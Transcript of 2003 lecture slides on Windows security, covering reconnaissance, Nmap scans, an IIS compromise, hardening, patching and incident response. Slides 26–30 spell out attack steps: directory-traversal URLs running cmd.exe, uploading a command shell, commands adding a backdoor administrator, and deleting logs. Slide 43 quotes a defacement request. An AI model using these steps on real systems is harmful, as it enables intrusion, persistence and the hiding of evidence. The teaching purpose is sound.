Transcript Windows Security Analysis

Slide 1
Windows Security Analysis
Computer Science E-Commerce Security ‘2003’
Matthew Cook
http://escarpment.net/
1
Slide 2
Introduction
Loughborough University
http://www.lboro.ac.uk/computing/
Bandwidth Management Advisory Service
http://bmas.ja.net/
2
Slide 3
Windows Security Analysis
Introduction
 Step-by-step Machine Compromise
 Preventing Attack
 Incident Response
 Further Reading

3
Slide 4
Introduction
Basic Security Overview
4
Slide 5
Physical Security
Secure Location
 BIOS restrictions
 Password Protection
 Boot Devices
 Case Locks
 Case Panels

5
Slide 6
Security Threats
Denial of Service
 Theft of information
 Modification
 Fabrication (Spoofing or Masquerading)

6
Slide 7
Security Threats…
Why a compromise can occur:
 Physical Security Holes
 Software Security Holes
 Incompatible Usage Security Holes
 Social Engineering
 Complacency
7
Slide 8
The Easiest Security Improvement
Good passwords
 Usernames and Passwords are the primary
security defence

Use a password that is easy to type to avoid
‘Shoulder Surfers’
 Use the first letters from song titles, song
lyrics or film quotations

8
Slide 9
Can you buy Security?
“This system is secure.” A product vendor
might say: “This product makes your
network secure.” Or: “We secure ecommerce.” Inevitably, these claims are
naïve and simplistic. They look at the security
of the product, rather than the security of the
system. The first questions to ask are:
“Secure from whom?” and “Secure
against what?”
Bruce Schneier
9
Slide 10
Step-by-step Machine
Compromise
Why, where, how?
10
Slide 11
Background
Reasons for Attack:
Personal Issues
 Political Statement
 Financial Gain (Theft of money, information)
 Learning Experience
 DoS (Denial of Service)
 Support for Illegal Activity

11
Slide 12
Gathering Information
Companies House
 Internet Search

URL: http://www.google.co.uk

Whois
URL: http://www.netsol.com/cgi-bin/whois/whois

A Whois query can provide:
– The Registrant
– The Domain Names Registered
– The Administrative, Technical and Billing Contact
– Record updated and created date stamps
– DNS Servers for the Domain
12
Slide 13
Gathering Information…

Use Nslookup or dig

dig @<dns server> <machine address>

Different query type available:
– A – Network address
– Any – All or Any Information available
– Mx – Mail exchange records
– Soa – Zone of Authority
– Hinfo – Host information
– Axfr – Zone Transfer
– Txt – Additional strings
13
Slide 14
Identifying System Weakness
Many products available:
 Nmap
 Nessus
Pandora
 Pwdump
 L0pht Crack
 Null Authentication

14
Slide 15
Nmap
Port Scanning Tool
 Stealth scanning, OS Fingerprinting
 Open Source
 Runs under Unix based OS
 Port development for Win32
 URL: http://www.insure.org/nmap/

15
Slide 16
Nmap
16
Slide 17
Nessus
Remote security scanner
 Very comprehensive
 Frequently updated modules
 Testing of DoS attacks
 Open Source
 Win32 and Java Client
 URL: http://nessus.org/

17
Slide 18
pwdump
Version 3 (e = encrypted)
 Developed by Phil Staubs and Erik
Hjelmstad
 Based on pwdump and pwdump2
 URL: http://www.ebiz-tech.com/html/pwdump.html
 Needs Administrative Privilidges
 Extracts hashs even if syskey is installed
 Extract from remote machines
 Identifies accounts with no password
 Self contained utility

18
Slide 19
L0pht Crack
Password Auditing and Recovery
 Crack Passwords from many sources
 Registration $249
 URL: http://www.atstake.com/research/lc3/

19
Slide 20
L0pht Crack
Crack Passwords from:
 Local Machine
 Remote Machine
 SAM File
 SMB Sniffer
 PWDump file
20
Slide 21
Nmap Analysis

-
nmap –sP 158.125.0.0/16
Ping scan!
nmap –sS158.125.0.0/16
- Stealth scan

21
Slide 22
Nmap Analysis…
TCP Connect Scan
 Completes a ‘Three Way Handshake’
 Very noisy (Detection by IDS)

22
Slide 23
Nmap Analysis…
TCP SYN Scan
 Half open scanning (Full port TCP
connection not made)
 Less noisy than the TCP Connect Scan

23
Slide 24
Nmap Analysis…

TCP FIN Scan

TCP Xmas Tree Scan

TCP Null Scan

UDP Scan
– FIN Packet sent to target port
– RST returned for all closed ports
– Mostly works UNIX based TCP/IP Stacks
– Sends a FIN, URG and PUSH packet
– RST returned for all closed ports
– Turns off all flags
– RST returned for all closed ports
– UDP Packet sent to target port
– “ICMP Port Unreachable” for closed ports
24
Slide 25
Null Authentication
Null Authentication:
 Net use \\camford\IPC$ “” /u:“”
 Famous tools like ‘Red Button’
 Net view \\camford
List of Users, groups and shares
 Last logged on date
 Last password change
 Much more…

25
Slide 26
Exploiting the Security Hole

Using IIS Unicode/Directory Traversal
/scripts/../../winnt/system32/cmd.exe /c+dir
 /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir


Displays the listing of c: in browser


Copy cmd.exe to /scripts/root.exe
Echo upload.asp
GET /scripts/root.exe /c+echo+[blah]>upload.asp
Upload cmdasp.asp using upload.asp

Still vulnerable on 24% of E-Commerce servers


26
Slide 27
Gaining ‘Root’
Cmdasp.asp provides a cmd shell in the
SYSTEM context
 Increase in privileges is now simple

ISAPI.dll – RevertToSelf (Horovitz)
 Version 2 coded by Foundstone
 http://camford/scripts/idq.dll?
 Patch Bulletin: MS01-26
 NOT included in Windows 2000 SP2

27
Slide 28
Backdoor Access
Create several user accounts
 Net user iisservice <pass> /ADD
 Net localgroup administrators iisservice /ADD
 Add root shells on high end ports
 Tiri is 3Kb in size
 Add backdoors to ‘Run’ registry keys

28
Slide 29
System Alteration
Web page alteration
 Information Theft
 Enable services
 Add VNC

Creating a Warez Server
 Net start msftpsvc
 Check access
 Upload file 1Mb in size
 Advertise as a warez server

29
Slide 30
Audit Trail Removal
Many machines have auditing disabled
 Main problems are IIS logs
 DoS IIS before logs sync to disc
 Erase logs from hard disc
 Erasing Eventlog harder

IDS Systems
 Network Monitoring at firewall

30
Slide 31
Preventing Attack
How to stop the attack from
happening and how to limit the
damage from crackers!
31
Slide 32
NetBIOS/SMB Services
NetBIOS Browsing Request [UDP 137]
 NetBIOS Browsing Response [UDP 138]
 NetBIOS Communications [TCP 135]
 CIFS [TCP 139, 445 UDP 445]
 Port 445 Windows 2000 only
 Block ports at firewall
 Netstat -A

32
Slide 33
NetBIOS/SMB Services…
To disable NetBIOS
1. Select ‘Disable NetBIOS’ in the WINS tab of
advanced TCP/IP properties.
2. Deselect ‘File and Print sharing’ in the
advanced settings of the ‘Network and Dialup connections’ window
33
Slide 34
NetBIOS/SMB Services…
Disable Null Authentication

HKLM\SYSTEM\CurrentControlSet\Control\LSA\Re
strictAnonymous

REG_DWORD set to 0, 1 or 2!

HKLM\SYSTEM\CurrentControlSet\Control\Secure
PipeServers\RestrictAnonymous

REG_DWORD set to 0 or 1
34
Slide 35
Operating System Patching
Operating Systems do contain bugs, and
patches are a common method of distributing
these fixes.
 A patch or hot fix usually contains a fix for
one discovered bug.
 Service packs contain multiple patches or
hotfixes. There are well over 200 hotfixes in
the soon to be released SP4 for Windows
2000.

35
Slide 36
Operating System Patching…
Only install patches after you have tested
them in a development environment.
 Only install patches obtained direct from the
vendor.
 Install security patches as soon as possible
after released.
 Install feature patches as and when needed.
 Automate patch collection and installation as
much as possible (QChain).

36
Slide 37
Operating System Patching…
Use automated patching technology:
 SUS – Microsoft Software Update Service
 SMS – Microsoft Systems Management
Server
 Ghost – Symantec imaging software.
And other application deployment software:
 Lights out Distribution
 Deferred installation
37
Slide 38
Baseline Security Analyzer
Freely available from Microsoft
 Written by Shavlik Technologies as a direct
result of Code Red attacks

A GUI to HFNetChk (v3.81)
 Improved feature set
 Integrated SUS functionality

38
Slide 39
Baseline Security Analyzer…
MBSA v1.1 supports the following host OS:
 Windows 2000 Professional / Server
 Windows XP Home / Professional
Windows .NET not officially supported
 Windows NT not supported as host OS


Remote scanning available
39
Slide 40
Baseline Security Analyzer…
What applications does MBSA scan?
 Operating system
 Internet Explorer > 5.01
 Microsoft Office 2000 and 2002
 Media Player > 6.4
 Internet Information Services 4.0 and 5.0
 SQL Server 7.0 and 2000
 Exchange Server 5.5 and 2000
40
Slide 41
IPSec
IP security
 Linux Connectivity using FreeS/WAN
 Mainly for wireless use
 WEP encryption cracked
 URL: http://www.freeswan.org/
 URL: http://airsnort.sourceforge.net/

41
Slide 42
Recent Worms
Sadmind/IIS
Directory Traversal (Unicode Exploit)
 CodeRed
ida/idq buffer overflow
 CodeGreen
ida/idq buffer overflow
 Nimda
Directory Traversal (Unicode Exploit)
 Slammer
MS SQL Server transaction control

42
Slide 43
Sadmind/IIS

2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80
GET /scripts/root.exe
/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br
^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%
3D100%^>^<td^>^<p+align%3D%22center%22^>^
<font+size%3D7+color%3Dred^>f***+USA+Govern
ment^</font^>^<tr^>^<td^>^<p+align%3D%22cente
r%22^>^<font+size%3D7+color%3Dred^>f***+Poiz
onBOx^<tr^>^<td^>^<p+align%3D%22center%22^>
^<font+size%3D4+color%3Dred^>contact:sysadmc
[email protected]^</html^>>../wwwroot/default.htm
200 43
Slide 44
IDS Snort
IDS – Intrusion Detection System
 Libpcap packet sniffer and logger
 Originally developed for the Unix platforms
 Open Source
 Port to Win32 available (Release 1.8.1)
 Installation on Win32 in under 30 minutes
 Run on your IIS server or standalone

44
Slide 45
IDS Snort…
Snort can detect:
 Stealth Port Scans
 CGI Attacks
 Front Page Extensions Attacks
 ICMP Activity
 SMTP Activity
 SQL Activity
 SMB Probes
45
Slide 46
Incident Response
What to do when something does
go wrong!
46
Slide 47
Incident Response…
Don’t Panic!
 Unplug the network
 Get a notebook
 Back-up the system and keep the Back-ups
 Restrict use of email
 Look for information
 Investigate the cause


Request help and assistance.
47
Slide 48
Incident Response…

Important to return to service swiftly
– Do not jeopardize security
– If in doubt, re-build
– Perform forensics on a backup
Keep documentation and evidence
 Contact local CERT if investigation proves
non worm/script kiddie activity.

48
Slide 49
Further Reading

Garfinkel, S. Web Security & Commerce
O’Reilly [ISBN 1-56592-269-7]

Hassler, V. Security Fundamentals for E-Commerce
Artech House [ISBN 1-58053-108-3]

Huth, M R A. Secure Communicating Systems
Cambridge Uni Press [ISBN 0-52180-731-X]

Schneier, B. Secrets & Lies (Digital Security in a
Networked World) [ISBN 0-47125-311-1]
49
Slide 50
Useful Books, Tools and URLs
Securing Windows NT/2000 Servers for the
Internet. (Stefan Norberg.)
 Incident Response. (Kenneth R. van Wyk,
Richard Forno.)
 Hacking Exposed: Network Security Secrets
& Solutions. (Stuart McClure et al)
 Hacking Exposed Windows 2000: Network
Security Secrets and Solutions. (Scambray.)

50
Slide 51
Useful Books, Tools and URLs
Microsoft Security Website
http://www.microsoft.com/security/
 Computer Security Incident Response Team
http://www.cert.org/csirts/csirt_faq.html
 JANET CERT
http://www.ja.net/cert/
 Bugtraq Mailing List
http://online.securityfocus.com/

51
Slide 52
Questions
Slides available at:
http://escarpment.net/
52